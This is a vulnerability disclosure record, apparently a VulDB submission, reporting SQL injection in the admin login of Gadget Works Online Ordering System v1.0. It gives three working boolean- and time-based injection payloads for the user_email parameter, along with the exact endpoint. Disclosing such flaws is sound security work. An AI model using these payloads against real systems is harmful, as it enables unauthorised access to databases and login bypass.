Submit #100621: Gadget Works Online Ordering System v1.0 /philosophy/admin/login.php post parameter user_email exists SQL injection vulnerabilityinfo

TitleGadget Works Online Ordering System v1.0 /philosophy/admin/login.php post parameter user_email exists SQL injection vulnerability
DescriptionAn issue was discovered in Gadget Works Online Ordering System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /philosophy/admin/login.php post parameter user_email. Payload1:user_email=a' rlike (select (case when (666=666) then 0x61 else 0x28 end))-- b&user_pass=b&btnLogin= Payload2:user_email=a' rlike (select (case when (666=555) then 0x61 else 0x28 end))-- b&user_pass=b&btnLogin= Payload3:user_email=a' and (select 1 from (select(sleep(20)))a)-- a&user_pass=b&btnLogin=
Source⚠️ https://github.com/heitaoa999/bug_report/blob/main/vendors/janobe/Gadget%20Works%20Online%20Ordering%20System/SQLi-1.md
Userheitaoa999 (ID 42741)
Submission03/12/2023 05:12 (1 Year ago)
Moderation03/12/2023 08:13 (3 hours later)
Accepted
Accepted
VulDB EntryVDB-222861

Do you need the next level of professionalism?

Upgrade your account now!